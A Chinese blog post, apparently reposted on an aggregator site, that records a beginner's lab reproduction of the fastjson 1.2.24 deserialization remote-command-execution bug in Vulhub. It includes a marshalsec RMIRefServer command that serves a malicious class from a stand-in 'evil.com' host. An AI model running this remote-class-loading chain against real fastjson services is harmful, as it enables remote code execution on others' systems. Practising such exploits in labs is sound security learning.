我是靠谱客的博主 危机蜡烛,最近开发中收集的这篇文章主要介绍Vulhub fastjson1.2.24写在前面的,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

目录

  • 写在前面的
    • 漏洞信息
    • 主要步骤
      • 1. 创建TouchFile.java并编译,上传到服务器中
      • 2. 从gitHub上拉取 [marshalsec](https://github.com/mbechler/marshalsec).并编译生成jar文件,启动RMI服务
      • 3.向靶场服务器发送Payload,带上RMI的地址
      • 4.查看docker容器中是否有success文件夹
    • 注意

写在前面的

网络安全小白一枚,对网安比较感兴趣,计划把 Vulhub 列出来的问题逐个尝试下,Vulhub中有详细的漏洞说明,光看是不行的,一定要亲自操作一番,为此记录下遇到问题。

漏洞信息

漏洞详情: fastjson 1.2.24 反序列化导致任意命令执行漏洞.

主要步骤

1. 创建TouchFile.java并编译,上传到服务器中

这里我用python3的http.server搭建一个简单的web服务,把编译后的TouchFile.class上传到web服务中

2. 从gitHub上拉取 marshalsec.并编译生成jar文件,启动RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999

注意:你的web服务是有端口号的的!

3.向靶场服务器发送Payload,带上RMI的地址

修改body里的信息,注意RMI地址别写错

4.查看docker容器中是否有success文件夹

#在/vulhub/fastjson/1.2.24-rce下执行
docker-compose exec web ls / tmp

如果有success表示成功

注意

我的服务器没有域名用的ip,忘加端口号导致RMI服务找不到这个文件,一直失败。注意端口

最后

以上就是危机蜡烛为你收集整理的Vulhub fastjson1.2.24写在前面的的全部内容,希望文章能够帮你解决Vulhub fastjson1.2.24写在前面的所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(46)

评论列表共有 0 条评论

立即
投稿
返回
顶部